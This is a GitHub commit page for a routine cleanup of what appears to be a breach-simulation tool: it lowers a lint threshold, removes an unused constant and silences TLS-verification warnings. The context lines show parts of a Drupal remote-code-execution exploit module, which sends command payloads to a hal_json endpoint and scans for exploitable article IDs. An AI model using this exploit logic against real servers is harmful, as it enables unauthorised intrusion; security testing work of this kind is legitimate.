Merge pull request #824 from guardicore/minor-deadcode-deletion

minor fixes
This commit is contained in:
Ophir Harpaz 2020-09-02 12:51:52 +03:00 committed by GitHub
commit 039a36c5ed
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 6 additions and 7 deletions

View File

@ -72,7 +72,7 @@ script:
## Display the linter issues
- cat flake8_warnings.txt
## Make sure that we haven't increased the amount of warnings.
- PYTHON_WARNINGS_AMOUNT_UPPER_LIMIT=90
- PYTHON_WARNINGS_AMOUNT_UPPER_LIMIT=80
- if [ $(tail -n 1 flake8_warnings.txt) -gt $PYTHON_WARNINGS_AMOUNT_UPPER_LIMIT ]; then echo "Too many python linter warnings! Failing this build. Lower the amount of linter errors in this and try again. " && exit 1; fi
## Check import order

View File

@ -21,7 +21,6 @@ LOG = logging.getLogger(__name__)
class DrupalExploiter(WebRCE):
_TARGET_OS_TYPE = ['linux', 'windows']
_EXPLOITED_SERVICE = 'Drupal Server'
DRUPAL_PORTS = [[80, False], [443, True]]
def __init__(self, host):
super(DrupalExploiter, self).__init__(host)
@ -73,7 +72,7 @@ class DrupalExploiter(WebRCE):
"""
payload = build_exploitability_check_payload(url)
response = requests.get(f'{url}?_format=hal_json',
response = requests.get(f'{url}?_format=hal_json', # noqa: DUO123
json=payload,
headers={"Content-Type": "application/hal+json"},
verify=False)
@ -90,11 +89,11 @@ class DrupalExploiter(WebRCE):
base = remove_port(url)
payload = build_cmd_execution_payload(base, cmd)
r = requests.get(f'{url}?_format=hal_json',
r = requests.get(f'{url}?_format=hal_json', # noqa: DUO123
json=payload,
headers={"Content-Type": "application/hal+json"},
verify=False)
if is_response_cached(r):
LOG.info(f'Exploiting {url} returned cache HIT, may have failed')
@ -111,7 +110,7 @@ class DrupalExploiter(WebRCE):
:return: vulnerable URL to exploit
"""
return self.vulnerable_urls.pop()
def are_vulnerable_urls_sufficient(self):
"""
For the Drupal exploit, 5 distinct URLs are needed to perform the full attack.
@ -137,7 +136,7 @@ def find_exploitbale_article_ids(base_url: str, lower: int = 1, upper: int = 100
articles = set()
while lower < upper:
node_url = urljoin(base_url, str(lower))
response = requests.get(node_url, verify=False)
response = requests.get(node_url, verify=False) # noqa: DUO123
if response.status_code == 200:
if is_response_cached(response):
LOG.info(f'Found a cached article at: {node_url}, skipping')